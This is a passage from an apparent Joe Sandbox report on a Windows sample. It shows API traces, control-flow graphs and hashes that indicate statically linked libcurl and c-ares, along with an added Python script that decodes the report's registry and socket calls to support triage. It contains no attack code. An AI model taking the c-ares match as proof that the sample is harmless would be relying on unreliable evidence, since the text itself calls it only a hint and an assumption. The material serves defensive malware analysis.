                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                  • API String ID: 3981526788-2373386790
                                  • Opcode ID: b4849c75f6a3582802d73e1f7ce1cc53fc1abe100b1da10edecdd2116577dfb3
                                  • Instruction ID: c2ddb770eb6cd777231527431999cb3319c0e72f5bda45d0d2a65c13ea3ecf4f
                                  • Opcode Fuzzy Hash: b4849c75f6a3582802d73e1f7ce1cc53fc1abe100b1da10edecdd2116577dfb3
                                  • Instruction Fuzzy Hash: FC62F771508341ABEB21CF14D845BEBB7E4BF91318F08692DF98867292E771E845CB93
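The registry calls listed two entries above (RegOpenKeyExA on HKLM\System\CurrentControlSet\Services\Tcpip\Parameters with access mask 0x20019, RegQueryValueExA for SearchList, Domain and DhcpDomain, the two DNSClient policy keys, and the per-interface RegEnumKeyExA loop) are exactly the value set c-ares walks to build the Windows DNS suffix search list, so on their own they are resolver-library behaviour rather than host reconnaissance. The setsockopt call in the entry just above decodes to level 6 (IPPROTO_TCP), option 1 (TCP_NODELAY), which libcurl sets on every new connection; the cf-socket.c strings beside it come from libcurl's connection-filter socket layer. The Python below is an added example, not part of the Joe Sandbox report, of the sample, or of c-ares or libcurl: it parses trace lines in the report's own format, decodes the hive, access-mask and socket-option constants, and flags a call set that matches c-ares' Windows configuration reader. The trace lines it runs on are copied from this page; the c-ares value-name set is taken from the library's source (ares_sysconfig_win.c in current releases) and is an assumption about this binary, not something the sandbox asserts.

```python
"""Decode Joe Sandbox API-trace lines ('<api>.<module>(<args>), ref: <addr>')
and classify the registry reads they describe."""
import re
from dataclasses import dataclass

# Trace lines copied from this report's API lists (constructed input for the
# example, not a live capture).
SAMPLE_TRACE = r"""
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F3AA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F3AA4C
RegCloseKey.KERNELBASE(?), ref: 00F3AB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00F3AB82
RegEnumKeyExA.KERNELBASE ref: 00F3AD8D
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00F3AE2A
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00F3B072
setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00EBA832
"""

API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"      # RegOpenKeyExA.KERNELBASE
    r"(?:\((?P<args>.*)\))?"               # optional (arg,arg,...)
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Registry constants (winreg.h / winnt.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
              0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
              0x20000: "READ_CONTROL"}
KEY_READ = 0x20019    # READ_CONTROL | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
# Winsock constants (ws2tcpip.h).
SOCK_LEVELS = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP", 0xFFFF: "SOL_SOCKET"}
TCP_OPTS = {1: "TCP_NODELAY"}
# Value names c-ares queries when building the Windows DNS suffix search list
# (from the c-ares source, ares_sysconfig_win.c); an assumption about this
# binary, not something the sandbox states.
CARES_DNS_VALUES = {"SearchList", "Domain", "DhcpDomain", "PrimaryDNSSuffix"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_trace(text):
    """Turn report lines into ApiCall records; raises on a line it cannot read."""
    calls = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised trace line: {line!r}")
        args = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("module"),
                             args.split(",") if args else [],
                             int(m.group("ref"), 16)))
    return calls


def _const(arg):
    """8-hex-digit literal -> int; '?' (unresolved by the sandbox) and names -> None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_access_mask(mask):
    if mask == KEY_READ:
        return "KEY_READ"
    names = [n for bit, n in KEY_RIGHTS.items() if mask & bit]
    return "|".join(names) if names else f"0x{mask:X}"


def describe(call):
    """Readable form of the call kinds that appear in this report."""
    a = call.args
    if call.api == "RegOpenKeyExA" and len(a) >= 4:
        hive, mask = _const(a[0]), _const(a[3])
        root = HIVES.get(hive, "<handle>")          # '?' means an already-open handle
        rights = decode_access_mask(mask) if mask is not None else "?"
        return f"open {root}\\{a[1]} ({rights})"
    if call.api == "RegQueryValueExA" and len(a) >= 2:
        return f"query value {a[1]!r}"
    if call.api == "setsockopt" and len(a) >= 5:
        level, opt, optlen = _const(a[1]), _const(a[2]), _const(a[4])
        lvl = SOCK_LEVELS.get(level, str(level))
        name = TCP_OPTS.get(opt, str(opt)) if lvl == "IPPROTO_TCP" else str(opt)
        return f"setsockopt({lvl}, {name}, optval={a[3]}, optlen={optlen})"
    return call.api


def registry_reads(calls):
    """Collect the keys opened and values queried, and say whether the set is
    the one c-ares' Windows DNS configuration reader produces."""
    keys = {c.args[1] for c in calls
            if c.api == "RegOpenKeyExA" and len(c.args) >= 2 and c.args[1] != "?"}
    values = {c.args[1] for c in calls
              if c.api == "RegQueryValueExA" and len(c.args) >= 2}
    under_tcpip = any("Tcpip\\Parameters" in k for k in keys)
    return {"keys": keys, "values": values,
            "cares_dns_sysconfig": under_tcpip and bool(values & CARES_DNS_VALUES)}


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for c in calls:
        print(f"{c.ref:08X}  {describe(c)}")
    print(registry_reads(calls))
```

The parser accepts both argument forms the report uses (a parenthesised list, or none at all as for RegEnumKeyExA). A '?' argument is one the sandbox could not resolve, typically a handle or an out-pointer, so the decoder prints it as-is rather than guessing. The match against CARES_DNS_VALUES is a triage hint only: it says the call set is consistent with a statically linked resolver, not that nothing else in the binary reads those keys.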

                                   Control-flow Graph (rendered in the original report, nodes marked Executed / Not Executed): function starting at 0x00F49740, with basic blocks calling RegOpenKeyExA, RegQueryValueExA and RegCloseKey; the node and edge list is omitted here.
                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F49946
                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00F49974
                                  • RegCloseKey.KERNELBASE(?), ref: 00F4998B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                  • API String ID: 3677997916-4129964100
                                  • Opcode ID: 329bd8e976220775dc93b944d907aeeb514963f6d649e0e1ba7fd62a5d4e279d
                                  • Instruction ID: 710c1f0b47bc962a80450d8f134d7c516e1432c4ce83e1460f554f9e94d2b067
                                  • Opcode Fuzzy Hash: 329bd8e976220775dc93b944d907aeeb514963f6d649e0e1ba7fd62a5d4e279d
                                  • Instruction Fuzzy Hash: E23284B5E08201ABEB11AB24EC42B1B7AE4AF54328F084434FD4996253F775ED19F793

                                   Control-flow Graph (rendered in the original report, nodes marked Executed / Not Executed): function starting at 0x00EB8B50, with basic blocks calling connect and SleepEx; the node and edge list is omitted here.
                                  APIs
                                  • connect.WS2_32(?,?,00000001), ref: 00EB8C30
                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00EB8CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: Sleepconnect
                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                  • API String ID: 238548546-879669977
                                  • Opcode ID: ab6cfb0dc5fb462e15a86d13b48fbaddd5d8f8dd8f45eb825fbb89baf28712e1
                                  • Instruction ID: 7e866999a6fbc1632e2455015f4e75447b1075c65b4513348de9f54170e882dc
                                  • Opcode Fuzzy Hash: ab6cfb0dc5fb462e15a86d13b48fbaddd5d8f8dd8f45eb825fbb89baf28712e1
                                  • Instruction Fuzzy Hash: DBB1A174604306AFDB10CF24CA85BE7BBE8AF45318F149A2DE8596B3D2DB71E844C751

                                   Control-flow Graph (rendered in the original report, nodes marked Executed / Not Executed): function starting at 0x00E82F17, with basic blocks calling RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA and RegCloseKey; the node and edge list is omitted here.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: EnumOpen
                                  • String ID: d
                                  • API String ID: 3231578192-2564639436
                                  • Opcode ID: f9723dc87772ed69be578622acdd8437a7004e8fdf06ee348bef52d6ee9dd7e6
                                  • Instruction ID: ded81d6cd23a6b134b0d5a14ec42bebb76e77a4fdfdb8e455ef4bacc4c3151e6
                                  • Opcode Fuzzy Hash: f9723dc87772ed69be578622acdd8437a7004e8fdf06ee348bef52d6ee9dd7e6
                                  • Instruction Fuzzy Hash: 807183B49043199FDB10EF69C58479EBBF0BF84308F10895DE998A7341D7749A88CF92

                                  Control-flow Graph

                                  control_flow_graph 1492 e876a0-e876be 1493 e876c0-e876c7 1492->1493 1494 e876e6-e876f2 send 1492->1494 1493->1494 1495 e876c9-e876d1 1493->1495 1496 e8775e-e87762 1494->1496 1497 e876f4-e87709 call e872a0 1494->1497 1498 e8770b-e87759 call e872a0 call e8cb20 call 1208c50 1495->1498 1499 e876d3-e876e4 1495->1499 1497->1496 1498->1496 1499->1497
                                  APIs
                                  • send.WS2_32(multi.c,?,?,?,N=,00000000,?,?,00E907BF), ref: 00E876EB
                                  Strings
                                  Similarity
                                  • API ID: send
                                  • String ID: LIMIT %s:%d %s reached memlimit$N=$SEND %s:%d send(%lu) = %ld$multi.c$send
                                  • API String ID: 2809346765-2907172669
                                  • Opcode ID: 6b150468fc21836c5cfe14c1ea7b19a33767252c174341098cd93d25cd40050b
                                  • Instruction ID: 43f4c7a92fa39008bfadb92682f629987ce19c52ab69bbe88e38f65e4572f6cf
                                  • Opcode Fuzzy Hash: 6b150468fc21836c5cfe14c1ea7b19a33767252c174341098cd93d25cd40050b
                                  • Instruction Fuzzy Hash: DB1127B66483047BD220AB15AC86D277B9CDF82B6CF25190DFD5C36351E261DC0083B2

                                  Control-flow Graph

                                  control_flow_graph 1611 eb9290-eb92ed call e876a0 1614 eb93c3-eb93ce 1611->1614 1615 eb92f3-eb92fb 1611->1615 1624 eb93d0-eb93e1 1614->1624 1625 eb93e5-eb9427 call e9d090 call ec4f40 1614->1625 1616 eb93aa-eb93af 1615->1616 1617 eb9301-eb9333 call e9d8c0 call e9d9a0 1615->1617 1618 eb9456-eb9470 1616->1618 1619 eb93b5-eb93bc 1616->1619 1635 eb93a7 1617->1635 1636 eb9335-eb9364 WSAIoctl 1617->1636 1622 eb9429-eb9431 1619->1622 1623 eb93be 1619->1623 1629 eb9439-eb943f 1622->1629 1630 eb9433-eb9437 1622->1630 1623->1618 1624->1619 1631 eb93e3 1624->1631 1625->1618 1625->1622 1629->1618 1634 eb9441-eb9453 call ec50a0 1629->1634 1630->1618 1630->1629 1631->1618 1634->1618 1635->1616 1639 eb939b-eb93a4 1636->1639 1640 eb9366-eb936f 1636->1640 1639->1635 1640->1639 1643 eb9371-eb9390 setsockopt 1640->1643 1643->1639 1644 eb9392-eb9395 1643->1644 1644->1639
                                  APIs
                                  • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00EB935C
                                  • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00EB9389
                                  Strings
                                  Similarity
                                  • API ID: Ioctlsetsockopt
                                  • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                  • API String ID: 1903391676-2691795271
                                  • Opcode ID: b32c6658376067d5ea90ca716452af63abbce1113c39a019771a1b762fbbd86d
                                  • Instruction ID: 6de042fe52a18fe1126cef2147a0cdab8f9a842e9513a99794f6a82f9a312166
                                  • Opcode Fuzzy Hash: b32c6658376067d5ea90ca716452af63abbce1113c39a019771a1b762fbbd86d
                                  • Instruction Fuzzy Hash: 30510370A04305ABD715DF24C881FEAB7A5FF84318F149529FE58AB293E730E951CB91

                                  Control-flow Graph

                                  control_flow_graph 1645 120d1d0-120d281 call 1208d18 1648 120d3b7-120d3c1 1645->1648 1649 120d287-120d28e 1645->1649 1650 120d2da-120d2dd 1649->1650 1651 120d290-120d2a1 1650->1651 1652 120d2df-120d305 1650->1652 1653 120d2a3-120d2aa 1651->1653 1654 120d2ac-120d2b6 1651->1654 1655 120d3b0 1652->1655 1656 120d30b-120d324 1652->1656 1653->1654 1657 120d2bf-120d2c2 1653->1657 1658 120d340-120d347 call 1208c68 1654->1658 1659 120d2bc 1654->1659 1655->1648 1660 120d326-120d332 1656->1660 1662 120d2c9-120d2d4 1657->1662 1678 120d34c 1658->1678 1659->1657 1663 120d334-120d337 1660->1663 1664 120d358-120d35d 1660->1664 1662->1650 1662->1655 1663->1658 1663->1664 1665 120d620-120d62a 1663->1665 1666 120d700-120d735 call 120b6a0 1663->1666 1667 120d602-120d604 1663->1667 1668 120d4e4-120d4f7 call 120b640 1663->1668 1669 120d4c6-120d4c8 1663->1669 1670 120d6a6-120d6af 1663->1670 1671 120d5e9-120d5ec 1663->1671 1672 120d4ab-120d4ad 1663->1672 1673 120d5cb-120d5cd 1663->1673 1674 120d5ad-120d5af 1663->1674 1675 120d570-120d576 1663->1675 1676 120d6d3-120d6dc 1663->1676 1677 120d4fc-120d4fe 1663->1677 1679 120d363-120d366 1664->1679 1680 120daeb-120db00 call 120b640 1664->1680 1689 120d630-120d643 1665->1689 1690 120d8d2-120d8e7 1665->1690 1666->1662 1687 120dad1-120dad4 1667->1687 1688 120d60a-120d61b 1667->1688 1668->1662 1681 120d3a0-120d3a4 1669->1681 1693 120d4ce-120d4df 1669->1693 1694 120d6b5-120d6ce call 120c9c0 1670->1694 1695 120da4c-120da65 call 120c9c0 1670->1695 1684 120d5f2-120d5fd 1671->1684 1685 120dbbc-120dbdd 1671->1685 1672->1681 1692 120d4b3-120d4c1 1672->1692 1673->1681 1683 120d5d3-120d5e4 1673->1683 1674->1681 1682 120d5b5-120d5c6 1674->1682 1675->1684 1701 120d578-120d57e 1675->1701 1697 120d6e2-120d6fb call 120ca50 1676->1697 1698 120d9de-120d9ee call 120ca50 1676->1698 1677->1681 1699 120d504-120d54f localeconv call 12178b0 1677->1699 1678->1657 1679->1680 1686 120d36c-120d36e 1679->1686 1680->1662 1702 120d3a6-120d3a8 
1681->1702 1682->1702 1683->1702 1684->1702 1685->1702 1704 120d374-120d37f 1686->1704 1705 120dadb-120dae6 1686->1705 1687->1680 1709 120dad6 1687->1709 1688->1702 1707 120d649-120d657 1689->1707 1708 120db9c-120db9e 1689->1708 1716 120dba0-120dba2 1690->1716 1717 120d8ed-120d8fd 1690->1717 1692->1702 1693->1702 1694->1662 1695->1662 1697->1662 1720 120d9f3-120d9f7 1698->1720 1740 120d551-120d556 1699->1740 1741 120d55e-120d56b 1699->1741 1718 120d584-120d592 1701->1718 1719 120db05-120db18 1701->1719 1702->1660 1725 120d3ae 1702->1725 1704->1681 1721 120d381-120d389 1704->1721 1723 120d663-120d670 1707->1723 1724 120d659-120d65c 1707->1724 1728 120dba4-120dbb7 call 120b9d0 1708->1728 1709->1705 1716->1728 1730 120d909-120d918 1717->1730 1731 120d8ff-120d902 1717->1731 1732 120dcd8-120dcda 1718->1732 1733 120d598-120d5a8 1718->1733 1719->1702 1720->1662 1736 120db8c-120db97 1721->1736 1737 120d38f-120d39c 1721->1737 1738 120d676-120d687 1723->1738 1739 120dcb9-120dcd3 call 120b9d0 1723->1739 1724->1723 1725->1655 1743 120dc9a-120dcb4 call 120b9d0 1730->1743 1744 120d91e-120d92f 1730->1744 1731->1730 1734 120dcf3-120dd13 1732->1734 1735 120dcdc-120dce7 1732->1735 1733->1702 1734->1702 1735->1734 1736->1702 1737->1681 1749 120db1d-120db26 1738->1749 1750 120d68d-120d6a1 call 120cc90 1738->1750 1739->1720 1740->1741 1741->1702 1743->1739 1746 120dc81-120dc8a 1744->1746 1747 120d935-120d93a 1744->1747 1746->1743 1753 120d940-120d97a call 120cc90 1747->1753 1754 120db5c-120db5f 1747->1754 1749->1754 1750->1720 1753->1720 1754->1746 1759 120db65 1754->1759 1759->1736
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: @$Inf$NaN
                                  • API String ID: 0-141429178
                                  • Opcode ID: 8f85685f63489075c252897024c47628f7dd3c21a25cbc47d9f71b10904d8725
                                  • Instruction ID: bec3a5497fbae7c3b223a987a90bef2701039896e7bbd79d15ee8a69ee2da7ee
                                  • Opcode Fuzzy Hash: 8f85685f63489075c252897024c47628f7dd3c21a25cbc47d9f71b10904d8725
                                  • Instruction Fuzzy Hash: 95F1B17062D38A8BD7229FA8C4407ABBBE1BB85314F048B1DDADD872C3D77599458B42

                                  Control-flow Graph

                                  control_flow_graph 1761 e87770-e8778e 1762 e87790-e87797 1761->1762 1763 e877b6-e877c2 recv 1761->1763 1762->1763 1766 e87799-e877a1 1762->1766 1764 e8782e-e87832 1763->1764 1765 e877c4-e877d9 call e872a0 1763->1765 1765->1764 1767 e877db-e87829 call e872a0 call e8cb20 call 1208c50 1766->1767 1768 e877a3-e877b4 1766->1768 1767->1764 1768->1765
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: recv
                                  • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                  • API String ID: 1507349165-640788491
                                  • Opcode ID: 71b37a070252354264661b07ccbe91189e1c4cbe94463f80dbf5b357622c7c8b
                                  • Instruction ID: 50d197f437657465b1c88d3e9e3a1f0bcb5882dab0f2ba71211c5e111b536b07
                                  • Opcode Fuzzy Hash: 71b37a070252354264661b07ccbe91189e1c4cbe94463f80dbf5b357622c7c8b
                                  • Instruction Fuzzy Hash: 641134B2A083147BD220BA159C49E273B9CDBC2B6CF14191CFD9C72352D262DC0083F1

                                  Control-flow Graph

                                  control_flow_graph 1780 e875e0-e875ed 1781 e875ef-e875f6 1780->1781 1782 e87607-e87629 socket 1780->1782 1781->1782 1783 e875f8-e875ff 1781->1783 1784 e8762b-e8763c call e872a0 1782->1784 1785 e8763f-e87642 1782->1785 1786 e87601-e87602 1783->1786 1787 e87643-e87699 call e872a0 call e8cb20 call 1208c50 1783->1787 1784->1785 1786->1782
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: socket
                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                  • API String ID: 98920635-842387772
                                  • Opcode ID: 2af8524be9a43e9374f0b85d7e23f356e4324ab6dcece6e19932b933eaffd5d1
                                  • Instruction ID: 93fa0070a3eba113b0c0a7e29e47c591a96befefaeea8f1631dc40c4eff2614b
                                  • Opcode Fuzzy Hash: 2af8524be9a43e9374f0b85d7e23f356e4324ab6dcece6e19932b933eaffd5d1
                                  • Instruction Fuzzy Hash: EE118C72A4031177D7216B29AC02F4B3B8CDF81778F151918F96CB62E2E211C854A3E1

                                  Control-flow Graph

                                  control_flow_graph 1965 eba150-eba159 1966 eba15f-eba17b 1965->1966 1967 eba250 1965->1967 1968 eba249-eba24f 1966->1968 1969 eba181-eba1ce getsockname 1966->1969 1968->1967 1970 eba1d0-eba1f5 call e9d090 1969->1970 1971 eba1f7-eba214 call ebef30 1969->1971 1978 eba240-eba246 call ec4f40 1970->1978 1971->1968 1976 eba216-eba23b call e9d090 1971->1976 1976->1978 1978->1968
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 00EBA1C7
                                  Strings
                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00EBA23B
                                  • getsockname() failed with errno %d: %s, xrefs: 00EBA1F0
                                  Similarity
                                  • API ID: getsockname
                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                  • API String ID: 3358416759-2605427207
                                  • Opcode ID: 6cb0694a73f3535d8512a204b09d71a8bc8c11bce4ff8069b7cb236e01948fe7
                                  • Instruction ID: 8d25c494b9e65224850f14b37916ceb1674e617ef834dc8186596152f1816a49
                                  • Opcode Fuzzy Hash: 6cb0694a73f3535d8512a204b09d71a8bc8c11bce4ff8069b7cb236e01948fe7
                                  • Instruction Fuzzy Hash: A0210C71908280B6FB259719DC42FE773BCEF91328F041624FA9863151FF32598587E2

                                  Control-flow Graph

                                  control_flow_graph 1985 e9d5e0-e9d5ee 1986 e9d5f0-e9d604 call e9d690 1985->1986 1987 e9d652-e9d662 WSAStartup 1985->1987 1993 e9d61b-e9d651 call ea7620 1986->1993 1994 e9d606-e9d614 1986->1994 1989 e9d670-e9d676 1987->1989 1990 e9d664-e9d66f 1987->1990 1989->1986 1991 e9d67c-e9d68d 1989->1991 1994->1993 1999 e9d616 1994->1999 1999->1993
                                  APIs
                                  • WSAStartup.WS2_32(00000202), ref: 00E9D65B
                                  Strings
                                  Similarity
                                  • API ID: Startup
                                  • String ID: if_nametoindex$iphlpapi.dll
                                  • API String ID: 724789610-3097795196
                                  • Opcode ID: b7b1409f38273bdffba678ae87edd615a1dad555cd90276681dfc9fb31646a33
                                  • Instruction ID: 8e7414ea37aa9cd39a7713e04fbfe55faf945fff19d22ddc2c764a6848e5be40
                                  • Opcode Fuzzy Hash: b7b1409f38273bdffba678ae87edd615a1dad555cd90276681dfc9fb31646a33
                                  • Instruction Fuzzy Hash: 06017BD0A4834187FB616B3DAD2B36625906B52308F492978D88CA61D7F738C498C393
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00F4AB9A
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00F4ABE4
                                  Similarity
                                  • API ID: ioctlsocketsocket
                                  • String ID:
                                  • API String ID: 416004797-0
                                  • Opcode ID: c9ad560cd6776760f96c4075073394d208ff2c04e9140d25b85089ff5af35f59
                                  • Instruction ID: a8d660fa9f2708dd0a79b46c04ea9f942b05e96f060390b0396db31a3c48ed8b
                                  • Opcode Fuzzy Hash: c9ad560cd6776760f96c4075073394d208ff2c04e9140d25b85089ff5af35f59
                                  • Instruction Fuzzy Hash: 81E1E471A443019BEB20CF15C884B6B7BE5FF85324F044A2CFDA89B291E775D944EB92
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: closesocket
                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 099caf356a4e554b2c270e06eb433fb7502fdb6ccb4a7f762cf5a80dea9a4219
                                  • Instruction ID: 1c8df51744cdc45a721e88728d5b44ea6a69b989904bb5061891d7efe19d91b8
                                  • Opcode Fuzzy Hash: 099caf356a4e554b2c270e06eb433fb7502fdb6ccb4a7f762cf5a80dea9a4219
                                  • Instruction Fuzzy Hash: 4CD05E33A092316B853069996C48C4BABA8DEC6F60B060C5CF99877218D220DC0083E2
                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00F4B29E,?,00000000,?,?), ref: 00F4B0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00F33C41,00000000), ref: 00F4B0C1
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: f24183b7e25ba5799881c7269ffa9ae13e8561fb9cb8b38b7537b3722968b35d
                                  • Instruction ID: c4bdf429deaec7cfebf1a693e2450bddac60247274a05b62b46c8f5c8d60b51f
